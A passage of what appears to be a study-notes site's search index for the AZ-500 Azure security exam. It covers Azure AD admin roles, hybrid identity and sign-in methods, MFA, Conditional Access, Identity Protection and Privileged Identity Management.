Directory. Additionally, this role grants the ability to manage support tickets and monitor service health, and to access the Teams and Skype for Business admin center. The account must also be licensed for Teams or it can't run Teams PowerShell cmdlets. Teams Administrator Users in this role can manage all aspects of the Microsoft Teams workload via the Microsoft Teams and Skype for Business admin center and the respective PowerShell modules. This includes, among other areas, all management tools related to telephony, messaging, meetings, and the teams themselves. This role additionally grants the ability to create and manage all Microsoft 365 groups, manage support tickets, and monitor service health. Teams Communications Administrator Users in this role can manage aspects of the Microsoft Teams workload related to voice and telephony. This includes the management tools for telephone number assignment, voice and meeting policies, and full access to the call analytics toolset. Teams Communications Support Engineer Users in this role can troubleshoot communication issues within Microsoft Teams and Skype for Business using the user call troubleshooting tools in the Microsoft Teams and Skype for Business admin center. Users in this role can view full call record information for all participants involved. This role has no access to view, create, or manage support tickets. Teams Communications Support Specialist Users in this role can troubleshoot communication issues within Microsoft Teams and Skype for Business using the user call troubleshooting tools in the Microsoft Teams and Skype for Business admin center. Users in this role can only view user details in the call for the specific user they've looked up. This role has no access to view, create, or manage support tickets. Teams Devices Administrator Users with this role can manage Teams-certified devices from the Teams admin center. This role allows viewing all devices at single glance, with ability to search and filter devices. The user can check details of each device including logged-in account, make and model of the device. The user can change the settings on the device and update the software versions. This role doesn't grant permissions to check Teams activity and call quality of the device. Tenant Creator Assign the Tenant Creator role to users who need to do the following tasks: -Create\u00a0both Azure Active Directory and Azure Active Directory B2C tenants even if the tenant creation toggle is turned off in the user settings Usage Summary Reports Reader Users with this role can access tenant level aggregated data and associated insights in Microsoft 365 admin center for Usage and Productivity Score but can't access any user level details or insights. In Microsoft 365 admin center for the two reports, we differentiate between tenant level aggregated data and user level details. This role gives an extra layer of protection on individual user identifiable data, which was requested by both customers and legal teams. User Administrator Assign the User Administrator role to users who need to do the following tasks: -Create users -Update most user properties for all users, including all administrators -Update sensitive properties (including user principal name) for some users -Disable or enable some users -Delete or restore some users -Create and manage user views -Create and manage all groups -Assign licenses for all users, including all administrators -Reset passwords -Invalidate refresh tokens -Update (FIDO) device keys -Update password expiration policies -Create and manage support tickets in Azure and the Microsoft 365 admin center -Monitor service healthUsers with this role\u00a0can't\u00a0do the following tasks: -Can't manage MFA. -Can't change the credentials or reset MFA for members and owners of a role-assignable group. -Can't manage shared mailboxes User Administrator Users with this role can\u00a0change passwords\u00a0for people who may have access to sensitive or private information or critical configuration inside and outside of Azure Active Directory. Changing the password of a user may mean the ability to assume that user's identity and permissions. For example: -Application Registration and Enterprise Application owners, who can manage credentials of apps they own. Those apps may have privileged permissions in Azure AD and elsewhere not granted to User Administrators. Through this path, a User Administrator may be able to assume the identity of an application owner and then further assume the identity of a privileged application by updating the credentials for the application. -Azure subscription owners, who may have access to sensitive or private information or critical configuration in Azure. -Security Group and Microsoft 365 group owners, who can manage group membership. Those groups may grant access to sensitive or private information or critical configuration in Azure AD and elsewhere. -Administrators in other services outside of Azure AD like Exchange Online, Office Security and compliance center, and human resources systems. -Nonadministrators\u00a0like executives, legal counsel, and human resources employees who may have access to sensitive or private information. Virtual Visits Administrator Users with this role can do the following tasks: -Manage and configure all aspects of Virtual Visits in Bookings in the Microsoft 365 admin center, and in the Teams Electronic Health Record (EHR) connector -View usage reports for Virtual Visits in the Teams admin center, Microsoft 365 admin center, and Power BI -View features and settings in the Microsoft 365 admin center, but can't edit any settings Windows 365 Administrator Users with this role have global permissions on Windows 365 resources, when the service is present. Additionally, this role contains the ability to manage users and devices in order to associate policy and create and manage groups. This role can create and manage security groups, but doesn't have administrator rights over Microsoft 365 groups. That means administrators can't update owners or memberships of Microsoft 365 groups in the organization. However, they can manage the Microsoft 365 group they create, which is a part of their end-user privileges. So, any Microsoft 365 group (not security group) they create is counted against their quota of 250. Assign the Windows 365 Administrator role to users who need to do the following tasks: -Manage Windows 365 Cloud PCs in Microsoft Endpoint Manager -Enroll and manage devices in Azure AD, including assigning users and policies -Create and manage security groups, but not role-assignable groups -View basic properties in the Microsoft 365 admin center -Read usage reports in the Microsoft 365 admin center -Create and manage support tickets in Azure and the Microsoft 365 admin center Windows Update Deployment Administrator Users in this role can create and manage all aspects of Windows Update deployments through the Windows Update for Business deployment service. The deployment service enables users to define settings for when and how updates are deployed, and specify which updates are offered to groups of devices in their tenant. It also allows users to monitor the update progress. Yammer Administrator Assign the Yammer Administrator role to users who need to do the following tasks: -Manage\u00a0all aspects of Yammer -Create,\u00a0manage, and\u00a0restore\u00a0Microsoft 365 Groups, but not role-assignable groups -View the hidden members of Security groups and Microsoft 365 groups, including role assignable groups -Read usage reports\u00a0in the Microsoft 365 admin center -Create\u00a0and\u00a0manage\u00a0service requests in the Microsoft 365 admin center -View announcements\u00a0in the Message center, but not security announcements -View\u00a0service health","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#15-deploy-azure-active-directory-domain-services","title":"1.5. Deploy Azure Active Directory Domain Services","text":"

                            Azure Active Directory Domain Services (Azure AD DS) provides managed domain services such as domain join, group policy, lightweight directory access protocol (LDAP), and Kerberos/New Technology LAN Manager (NTLM) authentication. You use these domain services without the need to deploy, manage, and patch domain controllers (DCs) in the cloud.

                            Azure AD DS integrates with your existing Azure AD tenant. This integration lets users sign in to services and applications connected to the managed domain using their existing credentials.

                            When you create an Azure AD DS managed domain, you define a unique namespace. This namespace is the domain name, such as\u00a0aaddscontoso.com. Two Windows Server domain controllers (DCs) are then deployed into your selected Azure region. This deployment of DCs is known as a replica set. You can expand a managed domain to have more than one replica set per Azure AD tenant. Replica sets can be added to any peered virtual network in any Azure region that supports Azure AD DS. You don't need to manage, configure, or update these DCs. The Azure platform handles the DCs as part of the managed domain, including backups and encryption at rest using Azure Disk Encryption.

                            Azure AD DS replicates identity information from Azure AD, so it works with Azure AD tenants that are cloud-only or synchronized with an on-premises AD DS environment. Azure AD DS performs a one-way synchronization from Azure AD to provide access to a central set of users, groups, and credentials. You can create resources directly in the managed domain (Azure ADDS), but they aren't synchronized back to Azure AD.

                            Concepts:

                            Azure Active Directory (Azure AD) - Cloud-based\u00a0identity and mobile device management that provides user account and authentication services for resources such as Microsoft 365, the Azure portal, or SaaS applications.

                            Azure AD can be synchronized with an on-premises AD DS environment to provide a single identity to users that works natively in the cloud.

                            Active Directory Domain Services (AD DS)\u00a0-\u00a0Enterprise-ready lightweight directory access protocol (LDAP) server\u00a0that provides key features such as identity and authentication, computer object management, group policy, and trusts.

                            AD DS is a central component in many organizations with an on-premises IT environment and provides core user account authentication and computer management features.

                            Azure Active Directory Domain Services (Azure AD DS)\u00a0-\u00a0Provides managed domain services\u00a0with a subset of fully compatible traditional AD DS features such as domain join, group policy, LDAP, and Kerberos / New Technology LAN Manager (NTLM) authentication.

                            Azure AD DS integrates with Azure AD, which can synchronize with an on-premises AD DS environment. This ability extends central identity use cases to traditional web applications that run in Azure as part of a lift-and-shift strategy.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#16-create-and-manage-azure-ad-users","title":"1.6. Create and manage Azure AD users","text":"

                            Note for deleted users:

                            The user is deleted and no longer appears on the\u00a0Users\u00a0-\u00a0All users\u00a0page. The user can be seen on the\u00a0Deleted users\u00a0page for the next\u00a030 days\u00a0and can be restored during that time. When a user is deleted, any licenses consumed by the user are made available for other users.

                            To update the identity, contact information, or job information for users whose source of authority is Windows Server Active Directory, you must use Windows Server Active Directory. After you complete the update, you must wait for the next synchronization cycle to complete before you see the changes.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#17-manage-users-with-azure-ad-groups","title":"1.7. Manage users with Azure AD groups","text":"

                            Azure AD lets you use groups to manage access to applications, data, and resources. Resources can be:

                            • Part of the Azure AD organization, such as permissions to manage objects through roles in Azure AD
                            • External to the organization, such as for Software as a Service (SaaS) apps
                            • Azure services
                            • SharePoint sites
                            • On-premises resources

                            There are\u00a0two group types\u00a0and\u00a0three group membership types.

                            Group types: - Security: Used to manage user and computer access to shared resources. - Microsoft 365: Provides collaboration opportunities by giving group members access to a shared mailbox, calendar, files, SharePoint sites, and more.

                            Membership types:

                            • Assigned: Lets you add specific users as members of a group and have unique permissions.
                            • Dynamic user: Lets you use dynamic membership rules to automatically add and remove members. If a member's attributes change, the system looks at your dynamic group rules for the directory to see if the member meets the rule requirements (is added), or no longer meets the rules requirements (is removed).
                            • Dynamic device: Lets you use dynamic group rules to automatically add and remove devices. If a device's attributes change, the system looks at your dynamic group rules for the directory to see if the device meets the rule requirements (is added), or no longer meets the rules requirements (is removed).

                            You can create a dynamic group for either devices or users but not for both. You can't create a device group based on the device owners' attributes. Device membership rules can only reference device attributions.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#18-configure-azure-ad-administrative-units","title":"1.8. Configure Azure AD administrative units","text":"

                            An administrative unit can contain only users and groups. Administrative units restrict permissions in a role to any portion of your organization that you define. You could, for example, use administrative units to delegate the Helpdesk Administrator role to regional support specialists.

                            To use administrative units, you need an Azure Active Directory Premium license for each administrative unit admin, and Azure Active Directory Free licenses for administrative unit members.

                            Available roles for Azure AD administrative units

                            Role Description Authentication Administrator Has access to view, set, and reset authentication method information for any non-admin user in the assigned administrative unit only. Groups Administrator Can manage all aspects of groups and groups settings, such as naming and expiration policies, in the assigned administrative unit only. Helpdesk Administrator Can reset passwords for non-administrators and Helpdesk administrators in the assigned administrative unit only. License Administrator Can assign, remove, and update license assignments within the administrative unit only. Password Administrator Can reset passwords for non-administrators and Password Administrators within the assigned administrative unit only. User Administrator Can manage all aspects of users and groups, including resetting passwords for limited admins within the assigned administrative unit only.","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#19-passwordless-authentication","title":"1.9. Passwordless authentication","text":"

                            Microsoft global Azure and Azure Government offer the following\u00a0three\u00a0passwordless authentication options that integrate with Azure Active Directory (Azure AD):

                            1. Windows Hello for Business: Windows Hello for Business is ideal for information workers that have their own designated Windows PC. The biometric and PIN credentials are directly tied to the user's PC, which prevents access from anyone other than the owner. With public key infrastructure (PKI) integration and built-in support for single sign-on (SSO), Windows Hello for Business provides a convenient method for seamlessly accessing corporate resources on-premises and in the cloud.
                            2. Microsoft Authenticator: You can also allow your employee's phone to become a passwordless authentication method. You may already be using the Authenticator app as a convenient multi-factor authentication option in addition to a password. You can also use the Authenticator App as a passwordless option.
                            3. Fast Identity Online2 (FIDO2) security keys: The FIDO (Fast IDentity Online) Alliance helps to promote open authentication standards and reduce the use of passwords as a form of authentication. FIDO2 is the latest standard that incorporates the web authentication (WebAuthn) standard. Users can register and then select a FIDO2 security key at the sign-in interface as their main means of authentication. These FIDO2 security keys are typically USB devices but could also use Bluetooth or Near-Field Communication (NFC).
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#2-implement-hybrid-identity","title":"2. Implement Hybrid Identity","text":"

                            Hybrid Identity is the process of connecting your on-premises Active Directory with your Azure Active Directory.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#21-deploy-azure-ad-connect","title":"2.1. Deploy Azure AD connect","text":"

                            Azure AD Connect will integrate your on-premises directories with Azure Active Directory.

                            Azure AD Connect provides the following features:

                            • Password hash synchronization. A sign-in method that synchronizes a hash of a users on-premises AD password with Azure AD.
                            • Pass-through authentication. A sign-in method that allows users to use the same password on-premises and in the cloud, but doesn't require the additional infrastructure of a federated environment.
                            • Federation integration. Federation is an optional part of Azure AD Connect and can be used to configure a hybrid environment using an on-premises AD FS infrastructure. It also provides AD FS management capabilities such as certificate renewal and additional AD FS server deployments.
                            • Synchronization. Responsible for creating users, groups, and other objects. As well as, making sure identity information for your on-premises users and groups is matching the cloud. This synchronization also includes password hashes.
                            • Health Monitoring. Azure AD Connect Health can provide robust monitoring and provide a central location in the Azure portal to view this activity.

                            Azure Active Directory (Azure AD) Connect Health\u00a0provides robust monitoring of your on-premises identity infrastructure. It enables you to maintain a reliable connection to Microsoft 365 and Microsoft Online Services. With Azure AD Connect the key data you need is easily accessible. You can view and act on alerts, setup email notifications for critical alerts, and view performance data. Using AD Connect Health works by installing an agent on each of your on-premises sync servers.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#23-introduction-to-authentication","title":"2.3 Introduction to Authentication","text":"

                            Identity is the new control plane of IT security. When the Azure AD hybrid identity solution is your new control plane, authentication is the foundation of cloud access. All the other advanced security and user experience features in Azure AD depends on your authentication method.

                            Azure AD supports the following authentication methods for hybrid identity solutions:

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#cloud-authentication","title":"Cloud authentication","text":"

                            Azure AD handles users' sign-in process. \u00a0Coupled with seamless single sign-on (SSO), users can sign in to cloud apps without having to reenter their credentials.

                            Option 1: Azure AD password hash synchronization.\u00a0The simplest way to enable authentication for on-premises directory objects in Azure AD.

                            Option 2: Azure AD Pass-through Authentication.\u00a0Provides a simple password validation for Azure AD authentication services by using a software agent that runs on one or more on-premises servers. The servers validate the users directly with your on-premises Active Directory, which ensures that the password validation doesn't happen in the cloud. Companies with a security requirement to immediately enforce on-premises user account states, password policies, and sign-in hours might use this authentication method.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#federal-authentication","title":"Federal authentication","text":"

                            Azure AD hands off the authentication process to a separate trusted authentication system, such as on-premises Active Directory Federation Services (AD FS), to validate the user\u2019s password. The authentication system can provide additional advanced authentication requirements. Examples are smartcard-based authentication or third-party multifactor authentication.

                            So, which one is more appropiate for your organization? See this decision tree:

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#24-azure-ad-password-hash-synchronization-phs","title":"2.4. Azure AD Password Hash Synchronization (PHS)","text":"

                            Password hash synchronization\u00a0(PHS) is a feature used to synchronize user passwords from an on-premises Active Directory instance to a cloud-based Azure AD instance. Use this feature to sign in to Azure AD services like Microsoft 365, Microsoft Intune, CRM Online, and Azure Active Directory Domain Services (Azure AD DS). You sign in to the service by using the same password you use to sign in to your on-premises Active Directory instance.

                            How does syncronization work? In the background, the password synchronization component takes the user\u2019s password hash from on-premises Active Directory, encrypts it, and passes it as a string to Azure. Azure decrypts the encrypted hash and stores the password hash as a user attribute in Azure AD. When the user signs in to an Azure service, the sign-in challenge dialog box generates a hash of the user\u2019s password and passes that hash back to Azure. Azure then compares the hash with the one in that user\u2019s account. If the two hashes match, then the two passwords must also match and the user receives access to the resource. The dialog box provides the facility to save the credentials so that the next time the user accesses the Azure resource, the user will not be prompted.

                            It is important to understand that this is\u00a0same sign-in, not single sign-on. The user still authenticates against two separate directory services, albeit with the same user name and password. This solution provides a simple alternative to an AD FS implementation.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#25-azure-ad-pass-through-authentication-pta","title":"2.5. Azure AD Pass-through Authentication (PTA)","text":"

                            Azure AD Pass-through Authentication\u00a0(PTA) allows users to sign in to both on-premises and cloud-based applications using the same user account and passwords. When users sign-in using Azure AD, Pass-through authentication validates the users\u2019 passwords directly against an organization's on-premise Active Directory. Benefits:

                            • Supports user sign-in into all web browser-based applications and into Microsoft Office client applications that use modern authentication.
                            • Sign-in usernames can be either the on-premises default username (userPrincipalName) or another attribute configured in Azure AD Connect (known as Alternate ID).
                            • Works seamlessly with conditional access features such as Azure Active Directory Multi-Factor Authentication to help secure your users.
                            • Integrated with cloud-based self-service password management, including password writeback to on-premises Active Directory and password protection by banning commonly used passwords.
                            • Multi-forest environments are supported if there are forest trusts between your AD forests and if name suffix routing is correctly configured.
                            • PTA is a free feature, and you don't need any paid editions of Azure AD to use it.
                            • PTA can be enabled via Azure AD Connect.
                            • PTA uses a lightweight on-premises agent that listens for and responds to password validation requests.
                            • Installing multiple agents provides high availability of sign-in requests.
                            • PTA protects your on-premises accounts against brute force password attacks in the cloud.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#26-azure-ad-federation","title":"2.6. Azure AD Federation","text":"

                            Federation is a collection of domains that have established trust. The level of trust may vary, but typically includes authentication and almost always includes authorization. A typical federation might include a number of organizations that have established trust for shared access to a set of resources. You can federate your on-premises environment with Azure AD and use this federation for authentication and authorization. This sign-in method ensures that all user authentication occurs on-premises. This method allows administrators to implement more rigorous levels of access control.

                            If you decide to use Federation with Active Directory Federation Services (AD FS), you can optionally set up password hash synchronization as a backup in case your AD FS infrastructure fails.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#27-configure-password-writeback","title":"2.7. Configure password writeback","text":"

                            Password writeback\u00a0is a feature enabled with Azure AD Connect that allows password changes in the cloud to be written back to an existing on-premises directory in real time.

                            To use\u00a0self-service password reset (SSPR)\u00a0you must have already configured Azure AD Connect in your environment.

                            Password writeback provides:

                            • Enforcement of on-premises Active Directory Domain Services password policies. When a user resets their password, it is checked to ensure it meets your on-premises Active Directory Domain Services policy before committing it to that directory. This review includes checking the history, complexity, age, password filters, and any other password restrictions that you have defined in local Active Directory Domain Services.
                            • Zero-delay feedback. Password writeback is a synchronous operation. Your users are notified immediately if their password did not meet the policy or could not be reset or changed for any reason.
                            • Supports password changes from the access panel and Microsoft 365. When federated or password hash synchronized users come to change their expired or non-expired passwords, those passwords are written back to your local Active Directory Domain Services environment.
                            • Supports password writeback when an admin resets them from the Azure portal. Whenever an admin resets a user\u2019s password in the Azure portal, if that user is federated or password hash synchronized, the password is written back to on-premises. This functionality is currently not supported in the Office admin portal.
                            • Doesn\u2019t require any inbound firewall rules. Password writeback uses an Azure Service Bus relay as an underlying communication channel. All communication is outbound over port 443.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#3-microsoft-entra-id-protection-identity-protection","title":"3. Microsoft Entra ID Protection (Identity Protection)","text":"

                            Risk detections in Azure AD Identity Protection include any identified suspicious actions related to user accounts in the directory. The signals generated that are fed to Identity Protection, can be further fed into tools like Conditional Access to make access decisions, or fed back to a security information and event management (SIEM) tool for further investigation based on your organization's enforced policies.

                            For your organization to be protected you can have:

                            • Azure AD Identity Protection policies can automatically block a sign-in attempt or require additional action, such as requiring a password change or prompt for Azure AD Multi-Factor Authentication.
                            • These policies work with existing Azure AD Conditional Access policies as an extra layer of protection for your organization.

                            Some of the following actions may trigger Azure AD Identity Protection risk detection:

                            • Users with leaked credentials.
                            • Sign-ins from anonymous IP addresses.
                            • Impossible travel to atypical locations.
                            • Sign-ins from infected devices.
                            • Sign-ins from IP addresses with suspicious activity.

                            Azure Active Directory Identity Protection includes three default policies that administrators can choose to enable:

                            The insight you get for a detected risk detection is tied to your Azure AD subscription.

                            • MFA registration policy\u00a0- Identity Protection can help organizations roll out Azure Multi-Factor Authentication using a Conditional Access policy requiring registration at sign-in. Makes sure users are registered for Azure AD Multi-Factor Authentication. If a sign-in risk policy prompts for MFA, the user must already be registered for Azure AD Multi-Factor Authentication.
                            • Sign-in risk policy\u00a0- Identity Protection analyzes signals from each sign-in, both real-time and offline, and calculates a risk score based on the probability that the sign-in wasn't performed by the user. Administrators can decide based on this risk score signal to enforce organizational requirements. Administrators can choose to block access, allow access, or allow access but require multi-factor authentication. Administrators can also choose to create a custom Conditional Access policy, including sign-in risk as an assignment condition.
                            • User risk policy\u00a0- Identifies and responds to user accounts that may have compromised credentials. Can prompt the user to create a new password.

                            When you enable a policy user or sign-in risk policy, you can also choose the threshold for risk level -\u00a0low and above,\u00a0medium and above, or\u00a0high. This flexibility lets you decide how aggressive you want to be in enforcing any controls for suspicious sign-in events.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#31-implement-user-risk-policy","title":"3.1. Implement user risk policy","text":"

                            Identity Protection can calculate what it believes is normal for a user's behavior and use that to base decisions for their risk. User risk is a calculation of probability that an identity has been compromised. Administrators can decide based on this risk score signal to enforce organizational requirements. Administrators can choose to block access, allow access, or allow access but require a password change using Azure AD self-service password reset.

                            The risky users report includes these data:

                            • Which users are at risk, have had risk remediated, or have had risk dismissed?
                            • Details about detections
                            • History of all risky sign-ins
                            • Risk history

                            Administrators can then choose to act on these events. Administrators can choose to:

                            • Reset the user password
                            • Confirm user compromise
                            • Dismiss user risk
                            • Block user from signing in
                            • Investigate further using Azure ATP
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#32-implement-sign-in-risk-policy","title":"3.2. Implement sign-in risk policy","text":"

                            Sign-in risk represents the probability that a given authentication request isn't authorized by the identity owner. For users of Azure Identity Protection, sign-in risk can be evaluated as part of a Conditional Access policy. Sign-in Risk Policy supports the following conditions:

                            • Location: When configuring location as a condition, organizations can choose to include or exclude locations. \u00a0These named locations may include the public IPv4 network information, country or region, or even unknown areas that don't map to specific countries or regions.
                            • Client apps: Conditional Access policies by default apply to browser-based applications and applications that utilize modern authentication protocols. In addition to these applications, administrators can choose to include Exchange ActiveSync clients and other clients that utilize legacy protocols.
                            • Risky sign-ins: The risky sign-ins report contains filterable data for up to the past 30 days (1 month). With the information provided by the risky sign-ins report, administrators can find:
                              • Which sign-ins are classified as at risk, confirmed compromised, confirmed safe, dismissed, or remediated.
                              • Real-time and aggregate risk levels associated with sign-in attempts.
                              • Detection types triggered.
                              • Conditional Access policies applied
                              • MFA details
                              • Device information
                              • Application information
                              • Location information

                            Administrators can then choose to take action on these events. Administrators can choose to:

                            • Confirm sign-in compromise
                            • Confirm sign-in safe
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#33-deploy-multifactor-authentication-in-azure","title":"3.3. Deploy multifactor authentication in Azure","text":"

                            For organizations that need to be compliant with industry standards, such as the Payment Card Industry (PCI) Data Security Standard (DSS) version 3.2, MFA is a must have capability to authenticate users. Beyond being compliant with industry standards, enforcing MFA to authenticate users can also help organizations to mitigate credential theft attacks.

                            Methods

                            Call to phone: Places an automated voice call. The user answers the call and presses # in the phone keypad to authenticate. The phone number is not synchronized to on-premises Active Directory. A voice call to phone is important because it persists through a phone handset upgrade, allowing the user to register the mobile app on the new device.

                            Text message to phone: Sends a text message that contains a verification code. The user is prompted to enter the verification code into the sign-in interface. This process is called one-way SMS. Two-way SMS means that the user must text back a particular code. Two-way SMS is deprecated and not supported after November 14, 2018. Users who are configured for two-way SMS are automatically switched to call to phone verification at that time.

                            Notification through mobile app: Sends a push notification to your phone or registered device. The user views the notification and selects Approve to complete verification. The Microsoft Authenticator app is available for Windows Phone, Android, and iOS. Push notifications through the mobile app provide the best user experience.

                            Verification code from mobile app: The Microsoft Authenticator app generates a new OATH verification code every 30 seconds. The user enters the verification code into the sign-in interface. The Microsoft Authenticator app is available for Windows Phone, Android, and iOS. Verification code from mobile app can be used when the phone has no data connection or cellular signal.

                            Settings

                            • Account lockout: The account lockout settings let you specify how many failed attempts to allow before the account becomes locked out for a period of time. \u00a0The account lockout settings are only applied when a pin code is entered for the MFA prompt. The following settings are available: Number of MFA denials to trigger account lockout, Minutes until account lockout counter is reset, Minutes until account is automatically unblocked.
                            • Block and unblock users: If a user's device has been lost or stolen, you can block authentication attempts for the associated account.
                            • Fraud alerts: Configure the fraud alert feature so that your users can report fraudulent attempts to access their resources. Code to report fraud during initial greeting: When users receive a phone call to perform two-step verification, they normally press # to confirm their sign-in. To report fraud, the user enters a code before pressing #. This code is 0 by default, but you can customize it.
                            • Notification: Email notifications can be configured when users report fraud alerts.
                            • OATH tokens: Azure AD supports the use of OATH-TOTP SHA-1 tokens that refresh codes every 30 or 60 seconds. Customers can purchase these tokens from the vendor of their choice.
                            • Trusted IPs: Trusted IPs is a feature to allow federated users or IP address ranges to bypass two-step authentication. Notice there are two selections in this screenshot.
                              • Managed tenants. For managed tenants, you can specify IP ranges that can skip MFA.
                              • Federated tenants. For federated tenants, you can specify IP ranges and you can also exempt AD FS claims users.

                            How to deploy MFA

                            To enable MFA, go to the User Properties in Azure Active Directory, and then the Multi-Factor Authentication option. From there, you can select the users that you want to modify and enable for MFA. You can also bulk enable groups of users with PowerShell. User's states can be\u00a0Enabled,\u00a0Enforced, or\u00a0Disabled.

                            Azure AD Multi-Factor Authentication is included free of charge for global administrator security. Enabling MFA for global administrators provides an added level of security when managing and creating Azure resources like virtual machines, managing storage, or using other Azure services. Secondary authentication includes phone call, text message, and the authenticator app. Remember, you can only enable MFA for organizational accounts stored in Azure Active Directory. These are also called work or school accounts.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#34-azure-ad-conditional-access","title":"3.4. Azure AD Conditional Access","text":"

                            Conditional Access is the tool used by Azure Active Directory to bring signals together, to make decisions, and enforce organizational policies. Conditional Access policies at their simplest are if-then statements, if a user wants to access a resource, then they must complete an action. Conditional Access policies are enforced after the first-factor authentication has been completed. Conditional Access is not intended as an organization's first line of defense for scenarios like denial-of-service (DoS) attacks but can use signals from these events to determine access.

                            Conditional Access is at the heart of the new\u00a0identity driven control plane. Identity as a Service\u2014the new control plane

                            Conditional access comes with six conditions: user/group, cloud application, device state, location (IP range), client application, and sign-in risk.

                            With access controls, you can either Block Access altogether or Grant Access with more requirements:

                            • Require MFA from Azure AD or an on-premises MFA (combined with AD FS).
                            • Grant access to only trusted devices.
                            • Require a domain-joined device.
                            • Require mobile devices to use Intune app protection policies.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#35-azure-active-directory-azure-ad-access-reviews","title":"3.5. Azure Active Directory (Azure AD) access reviews","text":"

                            Navigate to\u00a0Azure Active Directory (or Microsoft Entra ID) > Identity Governance. Select Access reviews.

                            Azure Active Directory (Azure AD) access reviews enable organizations to efficiently manage group memberships, access to enterprise applications, and role assignments.

                            Use access reviews in the following cases:

                            • Too many users in privileged roles: It's a good idea to check how many users have administrative access, how many of them are Global Administrators, and if there are any invited guests or partners that have not been removed after being assigned to do an administrative task. You can recertify the role assignment users in Azure AD roles such as Global Administrators, or Azure resources roles such as User Access Administrator in the Azure AD Privileged Identity Management (PIM) experience.
                            • When automation is infeasible: You can create rules for dynamic membership on security groups or Microsoft 365 Groups, but what if the HR data is not in Azure AD or if users still need access after leaving the group to train their replacement? You can then create a review on that group to ensure those who still need access should have continued access.
                            • When a group is used for a new purpose: If you have a group that is going to be synced to Azure AD, or if you plan to enable a sales management application for everyone in the Sales team group, it would be useful to ask the group owner to review the group membership prior to the group being used in a different risk content.
                            • Business critical data access: for certain resources, it might be required to ask people outside of IT to regularly sign out and give a justification on why they need access for auditing purposes.
                            • To maintain a policy's exception list: In an ideal world, all users would follow the access policies to secure access to your organization's resources. However, sometimes there are business cases that require you to make exceptions. As the IT admin, you can manage this task, avoid oversight of policy exceptions, and provide auditors with proof that these exceptions are reviewed regularly.
                            • Ask group owners to confirm they still need guests in their groups: Employee access might be automated with some on premises IAM, but not invited guests. If a group gives guests access to business sensitive content, then it's the group owner's responsibility to confirm the guests still have a legitimate business need for access.
                            • Have reviews recur periodically: You can set up recurring access reviews of users at set frequencies such as weekly, monthly, quarterly or annually, and the reviewers will be notified at the start of each review. Reviewers can approve or deny access with a friendly interface and with the help of smart recommendations.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#4-microsoft-entra-privileged-identity-management-pim","title":"4. Microsoft Entra Privileged Identity Management (PIM)","text":"

                            Using this feature requires Azure AD Premium P2 licenses. Azure AD Privileged Identity Management (PIM) allows you to manage, control, and monitor access to the most important resources in your organization. You can give just-in-time access and just-enough-access to users to allow them to do their tasks. Privileged Identity Management provides time-based and approval-based role activation to mitigate the risks of excessive, unnecessary, or misused access permissions on resources you care about. Here are some of the key features of Privileged Identity Management:

                            • Provide just-in-time privileged access to Azure AD and Azure resources
                            • Assign time-bound access to resources using start and end dates
                            • Require approval to activate privileged roles
                            • Enforce multi-factor authentication to activate any role
                            • Use justification to understand why users activate
                            • Get notifications when privileged roles are activated
                            • Conduct access reviews to ensure users still need roles
                            • Download audit history for internal or external audit
                            • Prevents removal of the last active Global Administrator and Privileged Role Administrator role assignments

                            Zero Trust model principles:

                            • Verify explicitly\u00a0- Always authenticate and authorize based on all available data points.
                            • Use least privilege access\u00a0- Limit user access with Just-In-Time and Just-Enough-Access (JIT/JEA), risk-based adaptive policies, and data protection.
                            • Assume breach\u00a0- Minimize blast radius and segment access. Verify end-to-end encryption and use analytics to get visibility, drive threat detection, and improve defenses.

                            Zero Trust model Architecture:

                            The primary components of this process are Intune for device management and device security policy configuration, Azure AD conditional access for device health validation, and Azure AD for user and device inventory. The system works with Intune, pushing device configuration requirements to the managed devices. The device then generates a statement of health, which is stored in Azure AD. When the device user requests access to a resource, the device health state is verified as part of the authentication exchange with Azure AD.

                            How does Privileged Identity Management work?

                            Once you set up Privileged Identity Management, you'll see Tasks, Manage, and Activity options in the left navigation menu. As an administrator, you'll choose between options such as managing Azure AD roles, managing Azure resource roles, or PIM for Groups. When you choose what you want to manage, you see the appropriate set of options for that option.

                            Azure AD roles:

                            • Can manage Azure AD: Privileged Role Administrator, and Global Administrator roles.
                            • Can read Azure AD roles: Global Administrators, Security Administrators, Global Readers, and Security Readers roles

                            Azure AD resources: - can be managed by: Subscription Administrator, Resource Owner, and Resource User Access Administrator roles. - can not even be read by: Privileged Role Administrators, Security Administrators, or Security Readers roles

